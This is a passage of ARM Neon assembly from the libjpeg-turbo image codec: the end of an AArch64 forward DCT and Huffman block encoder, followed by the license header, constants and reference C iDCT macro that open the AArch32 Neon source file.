rshrn2 v21.8h, v25.4s, #DESCALE_P1 /* dataptr[5] = (DCTELEM)DESCALE(tmp5 + z2 + z4, CONST_BITS-PASS1_BITS); */
rshrn2 v19.8h, v26.4s, #DESCALE_P1 /* dataptr[3] = (DCTELEM)DESCALE(tmp6 + z2 + z3, CONST_BITS-PASS1_BITS); */
rshrn2 v17.8h, v27.4s, #DESCALE_P1 /* dataptr[1] = (DCTELEM)DESCALE(tmp7 + z1 + z4, CONST_BITS-PASS1_BITS); */
/* Transpose back so pass 2 operates on rows */
transpose_8x8 v16, v17, v18, v19, v20, v21, v22, v23, v31, v2, v3, v4
/* 1-D FDCT */
add v24.8h, v16.8h, v23.8h /* tmp0 = dataptr[0] + dataptr[7]; */
sub v31.8h, v16.8h, v23.8h /* tmp7 = dataptr[0] - dataptr[7]; */
add v25.8h, v17.8h, v22.8h /* tmp1 = dataptr[1] + dataptr[6]; */
sub v30.8h, v17.8h, v22.8h /* tmp6 = dataptr[1] - dataptr[6]; */
add v26.8h, v18.8h, v21.8h /* tmp2 = dataptr[2] + dataptr[5]; */
sub v29.8h, v18.8h, v21.8h /* tmp5 = dataptr[2] - dataptr[5]; */
add v27.8h, v19.8h, v20.8h /* tmp3 = dataptr[3] + dataptr[4]; */
sub v28.8h, v19.8h, v20.8h /* tmp4 = dataptr[3] - dataptr[4]; */
/* even part */
add v8.8h, v24.8h, v27.8h /* tmp10 = tmp0 + tmp3; */
sub v9.8h, v24.8h, v27.8h /* tmp13 = tmp0 - tmp3; */
add v10.8h, v25.8h, v26.8h /* tmp11 = tmp1 + tmp2; */
sub v11.8h, v25.8h, v26.8h /* tmp12 = tmp1 - tmp2; */
add v16.8h, v8.8h, v10.8h /* tmp10 + tmp11 */
sub v20.8h, v8.8h, v10.8h /* tmp10 - tmp11 */
add v18.8h, v11.8h, v9.8h /* tmp12 + tmp13 */
srshr v16.8h, v16.8h, #PASS1_BITS /* dataptr[0] = (DCTELEM)DESCALE(tmp10 + tmp11, PASS1_BITS); */
srshr v20.8h, v20.8h, #PASS1_BITS /* dataptr[4] = (DCTELEM)DESCALE(tmp10 - tmp11, PASS1_BITS); */
smull2 v24.4s, v18.8h, XFIX_P_0_541 /* z1 hi = MULTIPLY(tmp12 + tmp13, XFIX_P_0_541); */
smull v18.4s, v18.4h, XFIX_P_0_541 /* z1 lo = MULTIPLY(tmp12 + tmp13, XFIX_P_0_541); */
mov v22.16b, v18.16b
mov v25.16b, v24.16b
smlal v18.4s, v9.4h, XFIX_P_0_765 /* lo z1 + MULTIPLY(tmp13, XFIX_P_0_765) */
smlal2 v24.4s, v9.8h, XFIX_P_0_765 /* hi z1 + MULTIPLY(tmp13, XFIX_P_0_765) */
smlal v22.4s, v11.4h, XFIX_N_1_847 /* lo z1 + MULTIPLY(tmp12, XFIX_N_1_847) */
smlal2 v25.4s, v11.8h, XFIX_N_1_847 /* hi z1 + MULTIPLY(tmp12, XFIX_N_1_847) */
rshrn v18.4h, v18.4s, #DESCALE_P2
rshrn v22.4h, v22.4s, #DESCALE_P2
rshrn2 v18.8h, v24.4s, #DESCALE_P2 /* dataptr[2] = (DCTELEM)DESCALE(z1 + MULTIPLY(tmp13, XFIX_P_0_765), CONST_BITS-PASS1_BITS); */
rshrn2 v22.8h, v25.4s, #DESCALE_P2 /* dataptr[6] = (DCTELEM)DESCALE(z1 + MULTIPLY(tmp12, XFIX_N_1_847), CONST_BITS-PASS1_BITS); */
/* Odd part */
add v8.8h, v28.8h, v31.8h /* z1 = tmp4 + tmp7; */
add v9.8h, v29.8h, v30.8h /* z2 = tmp5 + tmp6; */
add v10.8h, v28.8h, v30.8h /* z3 = tmp4 + tmp6; */
add v11.8h, v29.8h, v31.8h /* z4 = tmp5 + tmp7; */
smull v4.4s, v10.4h, XFIX_P_1_175 /* z5 lo = z3 lo * XFIX_P_1_175 */
smull2 v5.4s, v10.8h, XFIX_P_1_175
smlal v4.4s, v11.4h, XFIX_P_1_175 /* z5 = MULTIPLY(z3 + z4, FIX_1_175875602); */
smlal2 v5.4s, v11.8h, XFIX_P_1_175
smull2 v24.4s, v28.8h, XFIX_P_0_298
smull2 v25.4s, v29.8h, XFIX_P_2_053
smull2 v26.4s, v30.8h, XFIX_P_3_072
smull2 v27.4s, v31.8h, XFIX_P_1_501
smull v28.4s, v28.4h, XFIX_P_0_298 /* tmp4 = MULTIPLY(tmp4, FIX_0_298631336); */
smull v29.4s, v29.4h, XFIX_P_2_053 /* tmp5 = MULTIPLY(tmp5, FIX_2_053119869); */
smull v30.4s, v30.4h, XFIX_P_3_072 /* tmp6 = MULTIPLY(tmp6, FIX_3_072711026); */
smull v31.4s, v31.4h, XFIX_P_1_501 /* tmp7 = MULTIPLY(tmp7, FIX_1_501321110); */
smull2 v12.4s, v8.8h, XFIX_N_0_899
smull2 v13.4s, v9.8h, XFIX_N_2_562
smull2 v14.4s, v10.8h, XFIX_N_1_961
smull2 v15.4s, v11.8h, XFIX_N_0_390
smull v8.4s, v8.4h, XFIX_N_0_899 /* z1 = MULTIPLY(z1, -FIX_0_899976223); */
smull v9.4s, v9.4h, XFIX_N_2_562 /* z2 = MULTIPLY(z2, -FIX_2_562915447); */
smull v10.4s, v10.4h, XFIX_N_1_961 /* z3 = MULTIPLY(z3, -FIX_1_961570560); */
smull v11.4s, v11.4h, XFIX_N_0_390 /* z4 = MULTIPLY(z4, -FIX_0_390180644); */
add v10.4s, v10.4s, v4.4s
add v14.4s, v14.4s, v5.4s
add v11.4s, v11.4s, v4.4s
add v15.4s, v15.4s, v5.4s
add v28.4s, v28.4s, v8.4s /* tmp4 += z1 */
add v24.4s, v24.4s, v12.4s
add v29.4s, v29.4s, v9.4s /* tmp5 += z2 */
add v25.4s, v25.4s, v13.4s
add v30.4s, v30.4s, v10.4s /* tmp6 += z3 */
add v26.4s, v26.4s, v14.4s
add v31.4s, v31.4s, v11.4s /* tmp7 += z4 */
add v27.4s, v27.4s, v15.4s
add v28.4s, v28.4s, v10.4s /* tmp4 += z3 */
add v24.4s, v24.4s, v14.4s
add v29.4s, v29.4s, v11.4s /* tmp5 += z4 */
add v25.4s, v25.4s, v15.4s
add v30.4s, v30.4s, v9.4s /* tmp6 += z2 */
add v26.4s, v26.4s, v13.4s
add v31.4s, v31.4s, v8.4s /* tmp7 += z1 */
add v27.4s, v27.4s, v12.4s
rshrn v23.4h, v28.4s, #DESCALE_P2
rshrn v21.4h, v29.4s, #DESCALE_P2
rshrn v19.4h, v30.4s, #DESCALE_P2
rshrn v17.4h, v31.4s, #DESCALE_P2
rshrn2 v23.8h, v24.4s, #DESCALE_P2 /* dataptr[7] = (DCTELEM)DESCALE(tmp4 + z1 + z3, CONST_BITS-PASS1_BITS); */
rshrn2 v21.8h, v25.4s, #DESCALE_P2 /* dataptr[5] = (DCTELEM)DESCALE(tmp5 + z2 + z4, CONST_BITS-PASS1_BITS); */
rshrn2 v19.8h, v26.4s, #DESCALE_P2 /* dataptr[3] = (DCTELEM)DESCALE(tmp6 + z2 + z3, CONST_BITS-PASS1_BITS); */
rshrn2 v17.8h, v27.4s, #DESCALE_P2 /* dataptr[1] = (DCTELEM)DESCALE(tmp7 + z1 + z4, CONST_BITS-PASS1_BITS); */
/* store results */
st1 {v16.8h, v17.8h, v18.8h, v19.8h}, [DATA], 64
st1 {v20.8h, v21.8h, v22.8h, v23.8h}, [DATA]
/* Restore Neon registers */
ld1 {v8.8b, v9.8b, v10.8b, v11.8b}, [sp], 32
ld1 {v12.8b, v13.8b, v14.8b, v15.8b}, [sp], 32
ret /* was "br x30": RET keeps the return-address predictor in sync */
.unreq DATA
.unreq TMP
#undef XFIX_P_0_298
#undef XFIX_N_0_390
#undef XFIX_P_0_541
#undef XFIX_P_0_765
#undef XFIX_N_0_899
#undef XFIX_P_1_175
#undef XFIX_P_1_501
#undef XFIX_N_1_847
#undef XFIX_N_1_961
#undef XFIX_P_2_053
#undef XFIX_N_2_562
#undef XFIX_P_3_072
/*****************************************************************************/
/*
* GLOBAL(JOCTET *)
* jsimd_huff_encode_one_block(working_state *state, JOCTET *buffer,
* JCOEFPTR block, int last_dc_val,
* c_derived_tbl *dctbl, c_derived_tbl *actbl)
*
*/
/* Register aliases shared by the Huffman encoder below:
 * BUFFER     - output JOCTET pointer (kept one byte behind; stores use
 *              pre-increment writeback)
 * PUT_BUFFER - 64-bit bit accumulator, newest bits at the low end
 * PUT_BITS   - count of valid bits currently held in PUT_BUFFER
 */
BUFFER .req x1
PUT_BUFFER .req x6
PUT_BITS .req x7
PUT_BITSw .req w7
/* Emit the oldest pending byte from the bit accumulator.  Implements
 * JPEG byte stuffing: a 0xFF data byte is followed by a 0x00 so it
 * cannot be mistaken for a marker.  Clobbers x19. */
.macro emit_byte
sub PUT_BITS, PUT_BITS, #0x8
lsr x19, PUT_BUFFER, PUT_BITS
uxtb w19, w19
strb w19, [BUFFER, #1]!
cmp w19, #0xff
b.ne 14f
strb wzr, [BUFFER, #1]!
14:
.endm
/* Append the SIZE least-significant bits of CODE to the accumulator:
 * shift the previous bits up, bump the pending-bit count, then OR the
 * new code into the low end. */
.macro put_bits CODE, SIZE
lsl PUT_BUFFER, PUT_BUFFER, \SIZE
add PUT_BITS, PUT_BITS, \SIZE
orr PUT_BUFFER, PUT_BUFFER, \CODE
.endm
/* If 32 or more bits are pending, flush four bytes so that at least
 * 31 bits of accumulator headroom are free for the next put_bits. */
.macro checkbuf31
cmp PUT_BITS, #0x20
b.lt 31f
emit_byte
emit_byte
emit_byte
emit_byte
31:
.endm
/* If 48 or more bits are pending, flush six bytes so that at least
 * 47 bits of accumulator headroom are free for the next put_bits. */
.macro checkbuf47
cmp PUT_BITS, #0x30
b.lt 47f
emit_byte
emit_byte
emit_byte
emit_byte
emit_byte
emit_byte
47:
.endm
/*
 * Generate jsimd_huff_encode_one_block_neon (fast_tbl=1) or
 * jsimd_huff_encode_one_block_neon_slowtbl (fast_tbl=0):
 * Huffman-encode one 8x8 coefficient block.
 *
 * C-equivalent:
 *   JOCTET *jsimd_huff_encode_one_block_neon(working_state *state,
 *             JOCTET *buffer, JCOEFPTR block, int last_dc_val,
 *             c_derived_tbl *dctbl, c_derived_tbl *actbl)
 * In:  x0 = state, x1 = buffer, x2 = block, w3 = last_dc_val,
 *      x4 = dctbl, x5 = actbl
 * Out: x0 = updated output buffer pointer
 *
 * \fast_tbl == 1 reorders the coefficients into zigzag order with
 * tbl/tbx lookups; the slowtbl variant gathers the 64 coefficients with
 * scalar lane loads instead.
 * Fix: return via RET instead of BR x30 (return prediction / BTI).
 */
.macro generate_jsimd_huff_encode_one_block fast_tbl
.if \fast_tbl == 1
asm_function jsimd_huff_encode_one_block_neon
.else
asm_function jsimd_huff_encode_one_block_neon_slowtbl
.endif
sub sp, sp, 272
sub BUFFER, BUFFER, #0x1 /* BUFFER=buffer-- */
/* Save Arm registers */
stp x19, x20, [sp]
get_symbol_loc x15, Ljsimd_huff_encode_one_block_neon_consts
ldr PUT_BUFFER, [x0, #0x10]
ldr PUT_BITSw, [x0, #0x18]
ldrsh w12, [x2] /* load DC coeff in w12 */
/* prepare data */
.if \fast_tbl == 1
ld1 {v23.16b}, [x15], #16
ld1 {v0.16b, v1.16b, v2.16b, v3.16b}, [x15], #64
ld1 {v4.16b, v5.16b, v6.16b, v7.16b}, [x15], #64
ld1 {v16.16b, v17.16b, v18.16b, v19.16b}, [x15], #64
ld1 {v24.16b, v25.16b, v26.16b, v27.16b}, [x2], #64
ld1 {v28.16b, v29.16b, v30.16b, v31.16b}, [x2], #64
sub w12, w12, w3 /* last_dc_val, not used afterwards */
/* ZigZag 8x8 */
tbl v0.16b, {v24.16b, v25.16b, v26.16b, v27.16b}, v0.16b
tbl v1.16b, {v24.16b, v25.16b, v26.16b, v27.16b}, v1.16b
tbl v2.16b, {v25.16b, v26.16b, v27.16b, v28.16b}, v2.16b
tbl v3.16b, {v24.16b, v25.16b, v26.16b, v27.16b}, v3.16b
tbl v4.16b, {v28.16b, v29.16b, v30.16b, v31.16b}, v4.16b
tbl v5.16b, {v25.16b, v26.16b, v27.16b, v28.16b}, v5.16b
tbl v6.16b, {v27.16b, v28.16b, v29.16b, v30.16b}, v6.16b
tbl v7.16b, {v29.16b, v30.16b, v31.16b}, v7.16b
ins v0.h[0], w12
tbx v1.16b, {v28.16b}, v16.16b
tbx v2.16b, {v29.16b, v30.16b}, v17.16b
tbx v5.16b, {v29.16b, v30.16b}, v18.16b
tbx v6.16b, {v31.16b}, v19.16b
.else
/* Scalar zigzag gather: address computation interleaved with lane
 * loads to hide load latency. */
add x13, x2, #0x22
sub w12, w12, w3 /* last_dc_val, not used afterwards */
ld1 {v23.16b}, [x15]
add x14, x2, #0x18
add x3, x2, #0x36
ins v0.h[0], w12
add x9, x2, #0x2
ld1 {v1.h}[0], [x13]
add x15, x2, #0x30
ld1 {v2.h}[0], [x14]
add x19, x2, #0x26
ld1 {v3.h}[0], [x3]
add x20, x2, #0x28
ld1 {v0.h}[1], [x9]
add x12, x2, #0x10
ld1 {v1.h}[1], [x15]
add x13, x2, #0x40
ld1 {v2.h}[1], [x19]
add x14, x2, #0x34
ld1 {v3.h}[1], [x20]
add x3, x2, #0x1a
ld1 {v0.h}[2], [x12]
add x9, x2, #0x20
ld1 {v1.h}[2], [x13]
add x15, x2, #0x32
ld1 {v2.h}[2], [x14]
add x19, x2, #0x42
ld1 {v3.h}[2], [x3]
add x20, x2, #0xc
ld1 {v0.h}[3], [x9]
add x12, x2, #0x12
ld1 {v1.h}[3], [x15]
add x13, x2, #0x24
ld1 {v2.h}[3], [x19]
add x14, x2, #0x50
ld1 {v3.h}[3], [x20]
add x3, x2, #0xe
ld1 {v0.h}[4], [x12]
add x9, x2, #0x4
ld1 {v1.h}[4], [x13]
add x15, x2, #0x16
ld1 {v2.h}[4], [x14]
add x19, x2, #0x60
ld1 {v3.h}[4], [x3]
add x20, x2, #0x1c
ld1 {v0.h}[5], [x9]
add x12, x2, #0x6
ld1 {v1.h}[5], [x15]
add x13, x2, #0x8
ld1 {v2.h}[5], [x19]
add x14, x2, #0x52
ld1 {v3.h}[5], [x20]
add x3, x2, #0x2a
ld1 {v0.h}[6], [x12]
add x9, x2, #0x14
ld1 {v1.h}[6], [x13]
add x15, x2, #0xa
ld1 {v2.h}[6], [x14]
add x19, x2, #0x44
ld1 {v3.h}[6], [x3]
add x20, x2, #0x38
ld1 {v0.h}[7], [x9]
add x12, x2, #0x46
ld1 {v1.h}[7], [x15]
add x13, x2, #0x3a
ld1 {v2.h}[7], [x19]
add x14, x2, #0x74
ld1 {v3.h}[7], [x20]
add x3, x2, #0x6a
ld1 {v4.h}[0], [x12]
add x9, x2, #0x54
ld1 {v5.h}[0], [x13]
add x15, x2, #0x2c
ld1 {v6.h}[0], [x14]
add x19, x2, #0x76
ld1 {v7.h}[0], [x3]
add x20, x2, #0x78
ld1 {v4.h}[1], [x9]
add x12, x2, #0x62
ld1 {v5.h}[1], [x15]
add x13, x2, #0x1e
ld1 {v6.h}[1], [x19]
add x14, x2, #0x68
ld1 {v7.h}[1], [x20]
add x3, x2, #0x7a
ld1 {v4.h}[2], [x12]
add x9, x2, #0x70
ld1 {v5.h}[2], [x13]
add x15, x2, #0x2e
ld1 {v6.h}[2], [x14]
add x19, x2, #0x5a
ld1 {v7.h}[2], [x3]
add x20, x2, #0x6c
ld1 {v4.h}[3], [x9]
add x12, x2, #0x72
ld1 {v5.h}[3], [x15]
add x13, x2, #0x3c
ld1 {v6.h}[3], [x19]
add x14, x2, #0x4c
ld1 {v7.h}[3], [x20]
add x3, x2, #0x5e
ld1 {v4.h}[4], [x12]
add x9, x2, #0x64
ld1 {v5.h}[4], [x13]
add x15, x2, #0x4a
ld1 {v6.h}[4], [x14]
add x19, x2, #0x3e
ld1 {v7.h}[4], [x3]
add x20, x2, #0x6e
ld1 {v4.h}[5], [x9]
add x12, x2, #0x56
ld1 {v5.h}[5], [x15]
add x13, x2, #0x58
ld1 {v6.h}[5], [x19]
add x14, x2, #0x4e
ld1 {v7.h}[5], [x20]
add x3, x2, #0x7c
ld1 {v4.h}[6], [x12]
add x9, x2, #0x48
ld1 {v5.h}[6], [x13]
add x15, x2, #0x66
ld1 {v6.h}[6], [x14]
add x19, x2, #0x5c
ld1 {v7.h}[6], [x3]
add x20, x2, #0x7e
ld1 {v4.h}[7], [x9]
ld1 {v5.h}[7], [x15]
ld1 {v6.h}[7], [x19]
ld1 {v7.h}[7], [x20]
.endif
/* JPEG stores a negative coefficient as (coeff - 1) in SIZE bits;
 * abs + eor with the all-ones negative mask yields that bit pattern. */
cmlt v24.8h, v0.8h, #0
cmlt v25.8h, v1.8h, #0
cmlt v26.8h, v2.8h, #0
cmlt v27.8h, v3.8h, #0
cmlt v28.8h, v4.8h, #0
cmlt v29.8h, v5.8h, #0
cmlt v30.8h, v6.8h, #0
cmlt v31.8h, v7.8h, #0
abs v0.8h, v0.8h
abs v1.8h, v1.8h
abs v2.8h, v2.8h
abs v3.8h, v3.8h
abs v4.8h, v4.8h
abs v5.8h, v5.8h
abs v6.8h, v6.8h
abs v7.8h, v7.8h
eor v24.16b, v24.16b, v0.16b
eor v25.16b, v25.16b, v1.16b
eor v26.16b, v26.16b, v2.16b
eor v27.16b, v27.16b, v3.16b
eor v28.16b, v28.16b, v4.16b
eor v29.16b, v29.16b, v5.16b
eor v30.16b, v30.16b, v6.16b
eor v31.16b, v31.16b, v7.16b
/* Build a 64-bit zero/nonzero bitmap of the coefficients (interleaved
 * with the scalar DC-coefficient encode). */
cmeq v16.8h, v0.8h, #0
cmeq v17.8h, v1.8h, #0
cmeq v18.8h, v2.8h, #0
cmeq v19.8h, v3.8h, #0
cmeq v20.8h, v4.8h, #0
cmeq v21.8h, v5.8h, #0
cmeq v22.8h, v6.8h, #0
xtn v16.8b, v16.8h
xtn v18.8b, v18.8h
xtn v20.8b, v20.8h
xtn v22.8b, v22.8h
umov w14, v0.h[0]
xtn2 v16.16b, v17.8h
umov w13, v24.h[0]
xtn2 v18.16b, v19.8h
clz w14, w14
xtn2 v20.16b, v21.8h
lsl w13, w13, w14
cmeq v17.8h, v7.8h, #0
sub w12, w14, #32
xtn2 v22.16b, v17.8h
lsr w13, w13, w14
and v16.16b, v16.16b, v23.16b
neg w12, w12
and v18.16b, v18.16b, v23.16b
add x3, x4, #0x400 /* r1 = dctbl->ehufsi */
and v20.16b, v20.16b, v23.16b
add x15, sp, #0x90 /* x15 = t2 */
and v22.16b, v22.16b, v23.16b
ldr w10, [x4, x12, lsl #2]
addp v16.16b, v16.16b, v18.16b
ldrb w11, [x3, x12]
addp v20.16b, v20.16b, v22.16b
checkbuf47
addp v16.16b, v16.16b, v20.16b
put_bits x10, x11
addp v16.16b, v16.16b, v18.16b
checkbuf47
umov x9, v16.D[0]
put_bits x13, x12
cnt v17.8b, v16.8b
mvn x9, x9
addv B18, v17.8b
add x4, x5, #0x400 /* x4 = actbl->ehufsi */
umov w12, v18.b[0]
lsr x9, x9, #0x1 /* clear AC coeff */
ldr w13, [x5, #0x3c0] /* x13 = actbl->ehufco[0xf0] */
rbit x9, x9 /* x9 = index0 */
ldrb w14, [x4, #0xf0] /* x14 = actbl->ehufsi[0xf0] */
cmp w12, #(64-8)
add x11, sp, #16
b.lt 4f
cbz x9, 6f
st1 {v0.8h, v1.8h, v2.8h, v3.8h}, [x11], #64
st1 {v4.8h, v5.8h, v6.8h, v7.8h}, [x11], #64
st1 {v24.8h, v25.8h, v26.8h, v27.8h}, [x11], #64
st1 {v28.8h, v29.8h, v30.8h, v31.8h}, [x11], #64
1:
clz x2, x9
add x15, x15, x2, lsl #1
lsl x9, x9, x2
ldrh w20, [x15, #-126]
2:
cmp x2, #0x10
b.lt 3f
sub x2, x2, #0x10
checkbuf47
put_bits x13, x14
b 2b
3:
clz w20, w20
ldrh w3, [x15, #2]!
sub w11, w20, #32
lsl w3, w3, w20
neg w11, w11
lsr w3, w3, w20
add x2, x11, x2, lsl #4
lsl x9, x9, #0x1
ldr w12, [x5, x2, lsl #2]
ldrb w10, [x4, x2]
checkbuf31
put_bits x12, x10
put_bits x3, x11
cbnz x9, 1b
b 6f
4:
/* Few-zero-coefficient path: precompute SIZE/bit patterns with vector
 * clz/ushl instead of per-coefficient scalar clz. */
movi v21.8h, #0x0010
clz v0.8h, v0.8h
clz v1.8h, v1.8h
clz v2.8h, v2.8h
clz v3.8h, v3.8h
clz v4.8h, v4.8h
clz v5.8h, v5.8h
clz v6.8h, v6.8h
clz v7.8h, v7.8h
ushl v24.8h, v24.8h, v0.8h
ushl v25.8h, v25.8h, v1.8h
ushl v26.8h, v26.8h, v2.8h
ushl v27.8h, v27.8h, v3.8h
ushl v28.8h, v28.8h, v4.8h
ushl v29.8h, v29.8h, v5.8h
ushl v30.8h, v30.8h, v6.8h
ushl v31.8h, v31.8h, v7.8h
neg v0.8h, v0.8h
neg v1.8h, v1.8h
neg v2.8h, v2.8h
neg v3.8h, v3.8h
neg v4.8h, v4.8h
neg v5.8h, v5.8h
neg v6.8h, v6.8h
neg v7.8h, v7.8h
ushl v24.8h, v24.8h, v0.8h
ushl v25.8h, v25.8h, v1.8h
ushl v26.8h, v26.8h, v2.8h
ushl v27.8h, v27.8h, v3.8h
ushl v28.8h, v28.8h, v4.8h
ushl v29.8h, v29.8h, v5.8h
ushl v30.8h, v30.8h, v6.8h
ushl v31.8h, v31.8h, v7.8h
add v0.8h, v21.8h, v0.8h
add v1.8h, v21.8h, v1.8h
add v2.8h, v21.8h, v2.8h
add v3.8h, v21.8h, v3.8h
add v4.8h, v21.8h, v4.8h
add v5.8h, v21.8h, v5.8h
add v6.8h, v21.8h, v6.8h
add v7.8h, v21.8h, v7.8h
st1 {v0.8h, v1.8h, v2.8h, v3.8h}, [x11], #64
st1 {v4.8h, v5.8h, v6.8h, v7.8h}, [x11], #64
st1 {v24.8h, v25.8h, v26.8h, v27.8h}, [x11], #64
st1 {v28.8h, v29.8h, v30.8h, v31.8h}, [x11], #64
1:
clz x2, x9
add x15, x15, x2, lsl #1
lsl x9, x9, x2
ldrh w11, [x15, #-126]
2:
cmp x2, #0x10
b.lt 3f
sub x2, x2, #0x10
checkbuf47
put_bits x13, x14
b 2b
3:
ldrh w3, [x15, #2]!
add x2, x11, x2, lsl #4
lsl x9, x9, #0x1
ldr w12, [x5, x2, lsl #2]
ldrb w10, [x4, x2]
checkbuf31
put_bits x12, x10
put_bits x3, x11
cbnz x9, 1b
6:
add x13, sp, #0x10e
cmp x15, x13
b.hs 1f
ldr w12, [x5]
ldrb w14, [x4]
checkbuf47
put_bits x12, x14
1:
str PUT_BUFFER, [x0, #0x10]
str PUT_BITSw, [x0, #0x18]
ldp x19, x20, [sp], 16
add x0, BUFFER, #0x1
add sp, sp, 256 /* plus 16 already popped by the ldp above = 272 */
ret /* was "br x30": RET keeps the return-address predictor in sync */
.endm
/* Instantiate both variants: fast table-lookup and slow scalar-gather. */
generate_jsimd_huff_encode_one_block 1
generate_jsimd_huff_encode_one_block 0
/* Release the register aliases and helper macros; they are private to
 * the Huffman-encoder section above. */
.unreq BUFFER
.unreq PUT_BUFFER
.unreq PUT_BITS
.unreq PUT_BITSw
.purgem emit_byte
.purgem put_bits
.purgem checkbuf31
.purgem checkbuf47
|
open-vela/external_libjpeg-turbo | 43,740 | simd/arm/aarch32/jsimd_neon.S | /*
* Armv7 Neon optimizations for libjpeg-turbo
*
* Copyright (C) 2009-2011, Nokia Corporation and/or its subsidiary(-ies).
* All Rights Reserved.
* Author: Siarhei Siamashka <siarhei.siamashka@nokia.com>
* Copyright (C) 2014, Siarhei Siamashka. All Rights Reserved.
* Copyright (C) 2014, Linaro Limited. All Rights Reserved.
* Copyright (C) 2015, D. R. Commander. All Rights Reserved.
* Copyright (C) 2015-2016, 2018, Matthieu Darbois. All Rights Reserved.
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#if defined(__linux__) && defined(__ELF__)
.section .note.GNU-stack, "", %progbits /* mark stack as non-executable */
#endif
.text
.fpu neon
.arch armv7a
/* NOTE(review): .object_arch appears intended to keep the object's
 * architecture attribute at armv4 while still assembling Neon code
 * (runtime feature detection decides whether it is executed) --
 * confirm against the GAS ARM-directives documentation. */
.object_arch armv4
.arm
.syntax unified
/*****************************************************************************/
/* Supplementary macro for setting function attributes */
/* Declare a global function symbol in a platform-portable way:
 * Mach-O (__APPLE__) requires a leading underscore; on ELF the symbol
 * is additionally marked hidden and typed as a function. */
.macro asm_function fname
#ifdef __APPLE__
.private_extern _\fname
.globl _\fname
_\fname:
#else
.global \fname
#ifdef __ELF__
.hidden \fname
.type \fname, %function
#endif
\fname:
#endif
.endm
#define CENTERJSAMPLE 128
/*****************************************************************************/
/*
 * Perform dequantization and inverse DCT on one block of coefficients.
 *
 * GLOBAL(void)
 * jsimd_idct_islow_neon(void *dct_table, JCOEFPTR coef_block,
 * JSAMPARRAY output_buf, JDIMENSION output_col)
 */
/* DCT multiplier constants in 13-bit fixed point:
 * FIX_x_yyy... = round(x.yyy... * 2^13). */
#define FIX_0_298631336 (2446)
#define FIX_0_390180644 (3196)
#define FIX_0_541196100 (4433)
#define FIX_0_765366865 (6270)
#define FIX_0_899976223 (7373)
#define FIX_1_175875602 (9633)
#define FIX_1_501321110 (12299)
#define FIX_1_847759065 (15137)
#define FIX_1_961570560 (16069)
#define FIX_2_053119869 (16819)
#define FIX_2_562915447 (20995)
#define FIX_3_072711026 (25172)
/* Pre-combined sums/differences so that a value multiplied by two
 * constants can be computed as a single multiply-accumulate pair. */
#define FIX_1_175875602_MINUS_1_961570560 (FIX_1_175875602 - FIX_1_961570560)
#define FIX_1_175875602_MINUS_0_390180644 (FIX_1_175875602 - FIX_0_390180644)
#define FIX_0_541196100_MINUS_1_847759065 (FIX_0_541196100 - FIX_1_847759065)
#define FIX_3_072711026_MINUS_2_562915447 (FIX_3_072711026 - FIX_2_562915447)
#define FIX_0_298631336_MINUS_0_899976223 (FIX_0_298631336 - FIX_0_899976223)
#define FIX_1_501321110_MINUS_0_899976223 (FIX_1_501321110 - FIX_0_899976223)
#define FIX_2_053119869_MINUS_2_562915447 (FIX_2_053119869 - FIX_2_562915447)
#define FIX_0_541196100_PLUS_0_765366865 (FIX_0_541196100 + FIX_0_765366865)
/*
 * Reference SIMD-friendly 1-D ISLOW iDCT C implementation.
 * Uses some ideas from the comments in 'simd/jiss2int-64.asm'
 */
/* NOTE(review): this C macro appears not to be expanded anywhere in the
 * assembly; it seems to be kept as executable documentation of the
 * algorithm that the Neon code below implements -- confirm before
 * removing. */
#define REF_1D_IDCT(xrow0, xrow1, xrow2, xrow3, xrow4, xrow5, xrow6, xrow7) { \
DCTELEM row0, row1, row2, row3, row4, row5, row6, row7; \
JLONG q1, q2, q3, q4, q5, q6, q7; \
JLONG tmp11_plus_tmp2, tmp11_minus_tmp2; \
\
/* 1-D iDCT input data */ \
row0 = xrow0; \
row1 = xrow1; \
row2 = xrow2; \
row3 = xrow3; \
row4 = xrow4; \
row5 = xrow5; \
row6 = xrow6; \
row7 = xrow7; \
\
q5 = row7 + row3; \
q4 = row5 + row1; \
q6 = MULTIPLY(q5, FIX_1_175875602_MINUS_1_961570560) + \
MULTIPLY(q4, FIX_1_175875602); \
q7 = MULTIPLY(q5, FIX_1_175875602) + \
MULTIPLY(q4, FIX_1_175875602_MINUS_0_390180644); \
q2 = MULTIPLY(row2, FIX_0_541196100) + \
MULTIPLY(row6, FIX_0_541196100_MINUS_1_847759065); \
q4 = q6; \
q3 = ((JLONG)row0 - (JLONG)row4) << 13; \
q6 += MULTIPLY(row5, -FIX_2_562915447) + \
MULTIPLY(row3, FIX_3_072711026_MINUS_2_562915447); \
/* now we can use q1 (reloadable constants have been used up) */ \
q1 = q3 + q2; \
q4 += MULTIPLY(row7, FIX_0_298631336_MINUS_0_899976223) + \
MULTIPLY(row1, -FIX_0_899976223); \
q5 = q7; \
q1 = q1 + q6; \
q7 += MULTIPLY(row7, -FIX_0_899976223) + \
MULTIPLY(row1, FIX_1_501321110_MINUS_0_899976223); \
\
/* (tmp11 + tmp2) has been calculated (out_row1 before descale) */ \
tmp11_plus_tmp2 = q1; \
row1 = 0; \
\
q1 = q1 - q6; \
q5 += MULTIPLY(row5, FIX_2_053119869_MINUS_2_562915447) + \
MULTIPLY(row3, -FIX_2_562915447); \
q1 = q1 - q6; \
q6 = MULTIPLY(row2, FIX_0_541196100_PLUS_0_765366865) + \
MULTIPLY(row6, FIX_0_541196100); \
q3 = q3 - q2; \
\
/* (tmp11 - tmp2) has been calculated (out_row6 before descale) */ \
tmp11_minus_tmp2 = q1; \
\
q1 = ((JLONG)row0 + (JLONG)row4) << 13; \
q2 = q1 + q6; \
q1 = q1 - q6; \
\
/* pick up the results */ \
tmp0 = q4; \
tmp1 = q5; \
tmp2 = (tmp11_plus_tmp2 - tmp11_minus_tmp2) / 2; \
tmp3 = q7; \
tmp10 = q2; \
tmp11 = (tmp11_plus_tmp2 + tmp11_minus_tmp2) / 2; \
tmp12 = q3; \
tmp13 = q1; \
}
/* d-register lane aliases for the constants loaded from
 * jsimd_idct_islow_neon_consts below.  d0/d1 stay resident throughout;
 * d2 holds the "reloadable" constants, which the code reloads from the
 * table whenever d2 has been clobbered. */
